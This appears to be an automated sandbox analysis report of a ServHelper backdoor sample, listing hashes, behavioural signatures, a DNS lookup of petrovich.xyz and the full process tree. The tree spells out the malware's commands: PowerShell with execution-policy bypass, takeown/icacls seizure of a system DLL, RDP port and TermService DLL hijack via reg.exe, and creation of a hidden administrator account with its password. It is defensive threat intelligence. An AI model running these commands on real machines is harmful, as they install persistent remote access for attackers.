Analysis

- Max time kernel: 142s
- Max time network: 160s
- Platform: windows10-2004_x64
- Resource: win10v2004-20220414-en
- Submitted: 03-05-2022 19:24

- Static task: static1
- Behavioral task: behavioral1
  Sample: 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
  Resource: win7-20220414-en
- Behavioral task: behavioral2
  Sample: 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
  Resource: win10v2004-20220414-en
General

- Target: 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
- Size: 3.2MB
- MD5: 337e4fd5e423ee5e716ed7ee270bcd00
- SHA1: 6390cf1f9b5a7e5dc3494d603c634e8b5c9b6233
- SHA256: 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398
- SHA512: e44814ffdfda11c7f2461b3ec8fa587bf2ca28b8f48b28a9bf103d5a3faf3e5293995c88e8e625eb71f856b5e5160f52ef011a5decd3acd4b1029aa63591e724
Malware Config
Signatures

- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  PID   Process
  2444  icacls.exe
  964   takeown.exe
  2952  icacls.exe
  3576  icacls.exe
  4984  icacls.exe
  4160  icacls.exe
  4332  icacls.exe
  4248  icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches
  Resource                                      Rule
  behavioral2/files/0x0007000000023168-173.dat  upx
  behavioral2/files/0x0007000000023169-174.dat  upx
- Loads dropped DLL (2 IoCs)
  PID   Process
  2148  Process not Found
  2148  Process not Found
- Modifies file permissions (1 TTP, 8 IoCs)
  PID   Process
  3576  icacls.exe
  4984  icacls.exe
  4160  icacls.exe
  4332  icacls.exe
  4248  icacls.exe
  2444  icacls.exe
  964   takeown.exe
  2952  icacls.exe
- Drops file in System32 directory (1 IoC)
  Description   IoC                             Process
  File created  C:\Windows\system32\rfxvmt.dll  powershell.exe
- Drops file in Windows directory (8 IoCs)
  Description                   IoC                               Process
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg    powershell.exe
  File created                  C:\Windows\branding\mediasrv.png  powershell.exe
  File created                  C:\Windows\branding\mediasvc.png  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg    powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd       powershell.exe
  File opened for modification  C:\Windows\branding\shellbrd      powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
- Modifies registry key (1 TTP, 1 IoC)
  PID   Process
  4440  reg.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (11 IoCs)
  PID   Process
  3916  powershell.exe
  3916  powershell.exe
  4200  powershell.exe
  4200  powershell.exe
  5032  powershell.exe
  5032  powershell.exe
  4752  powershell.exe
  4752  powershell.exe
  3916  powershell.exe
  3916  powershell.exe
  3916  powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  PID   Process
  668   Process not Found
  668   Process not Found
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Description                PID   Process
  Token: SeDebugPrivilege    3916  powershell.exe
  Token: SeDebugPrivilege    4200  powershell.exe
  Token: SeDebugPrivilege    5032  powershell.exe
  Token: SeDebugPrivilege    4752  powershell.exe
  Token: SeRestorePrivilege  3576  icacls.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe (PID 1632)
  Command line: "C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"
  - Suspicious use of WriteProcessMemory

    \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 3916)
      Command line: -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 3796)
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline"
          - Suspicious use of WriteProcessMemory

            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 1500)
              Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB693.tmp" "c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP"

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4200)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5032)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4752)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\takeown.exe (PID 964)
          Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 2952)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 3576)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\icacls.exe (PID 4984)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 4160)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 4332)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 4248)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe (PID 2444)
          Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\reg.exe (PID 2868)
          Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

        C:\Windows\system32\reg.exe (PID 4440)
          Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          - Modifies registry key

        C:\Windows\system32\reg.exe (PID 2392)
          Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

        C:\Windows\system32\net.exe (PID 3664)
          Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          - Suspicious use of WriteProcessMemory

            C:\Windows\system32\net1.exe (PID 4816)
              Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

        C:\Windows\system32\cmd.exe (PID 4972)
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

            C:\Windows\system32\cmd.exe (PID 2600)
              Command line: cmd /c net start rdpdr
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\net.exe (PID 5064)
                  Command line: net start rdpdr
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\net1.exe (PID 1608)
                      Command line: C:\Windows\system32\net1 start rdpdr

        C:\Windows\system32\cmd.exe (PID 1848)
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

            C:\Windows\system32\cmd.exe (PID 4580)
              Command line: cmd /c net start TermService
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\net.exe (PID 1016)
                  Command line: net start TermService
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\net1.exe (PID 5056)
                      Command line: C:\Windows\system32\net1 start TermService

        C:\Windows\system32\cmd.exe (PID 1616)
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

        C:\Windows\system32\cmd.exe (PID 2824)
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe (PID 3708)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe (PID 3928)
      Command line: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe (PID 2488)
          Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe (PID 4936)
  Command line: cmd /C net.exe user WgaUtilAcc pd21abwo /add
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe (PID 2844)
      Command line: net.exe user WgaUtilAcc pd21abwo /add
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe (PID 1712)
          Command line: C:\Windows\system32\net1 user WgaUtilAcc pd21abwo /add

C:\Windows\System32\cmd.exe (PID 3952)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

    C:\Windows\system32\net.exe (PID 4952)
      Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

        C:\Windows\system32\net1.exe (PID 3316)
          Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe (PID 5060)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD

    C:\Windows\system32\net.exe (PID 204)
      Command line: net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD

        C:\Windows\system32\net1.exe (PID 872)
          Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD

C:\Windows\System32\cmd.exe (PID 3040)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

    C:\Windows\system32\net.exe (PID 3248)
      Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

        C:\Windows\system32\net1.exe (PID 1384)
          Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe (PID 3264)
  Command line: cmd /C net.exe user WgaUtilAcc pd21abwo

    C:\Windows\system32\net.exe (PID 4008)
      Command line: net.exe user WgaUtilAcc pd21abwo

        C:\Windows\system32\net1.exe (PID 2516)
          Command line: C:\Windows\system32\net1 user WgaUtilAcc pd21abwo
Network

- Remote address: 8.8.8.8:53
  Request: 96.108.152.52.in-addr.arpa IN PTR
  Response:
- Remote address: 8.8.8.8:53
  Request: petrovich.xyz IN A
  Response: petrovich.xyz IN A 188.114.97.0; petrovich.xyz IN A 188.114.96.0
MITRE ATT&CK Enterprise v6
Downloads